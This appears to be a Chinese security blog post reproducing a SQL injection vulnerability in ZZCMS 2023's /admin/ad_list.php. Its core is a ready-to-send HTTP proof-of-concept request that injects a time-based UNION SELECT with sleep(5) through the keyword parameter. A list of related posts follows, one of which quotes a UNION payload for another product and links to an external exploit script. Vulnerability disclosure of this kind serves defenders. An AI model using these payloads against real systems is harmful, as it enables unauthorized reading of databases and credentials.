zzcms系统接口ad_list.php存在SQL注入

原创 于 2025-05-27 23:52:05 发布 · 172 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #网络安全 #漏洞利用

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

ZZCMS 2023是一款快速建站系统,产品招商模板程序源码,可以快速搭建产品招商网。例如医药招商、保健品招商、化妆品招商、农产品招商、孕婴童招商、酒类副食品等。 /admin/ad_list.php组件中关键字过滤导致sql注入

poc

GET /admin/ad_list.php?action=pass&&keyword='+union+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(5)+--+x HTTP/1.1
Host: 127.0.0.1:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q;
Connection: close

问题来源

JeeWMS cgFormBuildController.do SQL注入漏洞复现(CVE-2025-0391)
0xSec
02-06 3237
JeeWMS cgFormBuildController.do 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞
缘梦未来的博客
01-09 333
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。 它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。
漏洞复现】瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI
漏洞复现
06-19 1468
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口存在SQL注入漏洞,恶意攻击者可能会利用漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
百易云资产管理系统admin.ticket.close.php存在SQL注入
最新发布
swordheart的博客
05-23 289
百易云资产管理系统admin.ticket.close.php接口存在sql注入
禅道16.5 SQL注入(CNVD-2022-42853)
qq_50854662的博客
02-15 1308
禅道16.5 SQL注入(CNVD-2022-42853)
zzcms接口index.php id参数存在SQL注入漏洞
shelter1234567的博客
02-08 739
zzcms接口index.php id参数存在SQL注入漏洞ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。攻击者可通过sql盲注等手段,获取数据库信息。
zzcms sql注入分析
课嗨教育的专栏
10-26 659
action=="del" 下面应用sql语句不存在任何过滤,被直接带入到了query中执行。
[CMS程序]zzcms网站管理系统 1.0 Build 090831_zzcms.zip
03-21
9. **安全防护**: 安全是任何CMS的重要考虑因素,zzcms可能会有定期的安全更新,以防止SQL注入、XSS攻击等常见的网络安全威胁。 10. **更新与维护**: 随着时间推移,开发者会发布新的补丁和更新,修复已知问题,...
[CMS程序]zzcms网站管理系统 1.0 Build 090831_zzcms.rar
04-18
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
ZZCMS index.php SQL注入漏洞复现(CVE-2025-0565)(附脚本)
iSee857的博客
02-07 1001
ZZCMS index.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
金和OA 数据字典 c6
09-06
金和OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
金和OA C6/S-系统管理员手册.pdf
07-31
详细介绍金和OA C6版系统管理使用手册
金和OA,C6配置手册
08-31
金和办公OA系统,C6版本配置手册,一般你找不到哦。
sql注入合集_禅道sql注入
2501_90424690的博客
02-03 471
sqlmap跑一下。
禅道V16.5SQL注入漏洞(CNVD-2022-42853)
RestoreJustice的博客
03-23 1098
禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。
瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞
2401_88792439的博客
01-29 386
CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-exp一键验证脚本:www.gddertr.xyz/瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞.py。返回admin即可验证漏洞
漏洞复现--金和OA clobfield SQL注入
qq_53003652的博客
12-19 1027
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞
金和OA C6 HomeService.asmx SQL注入漏洞
waxcj的博客
01-09 554
20240109
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值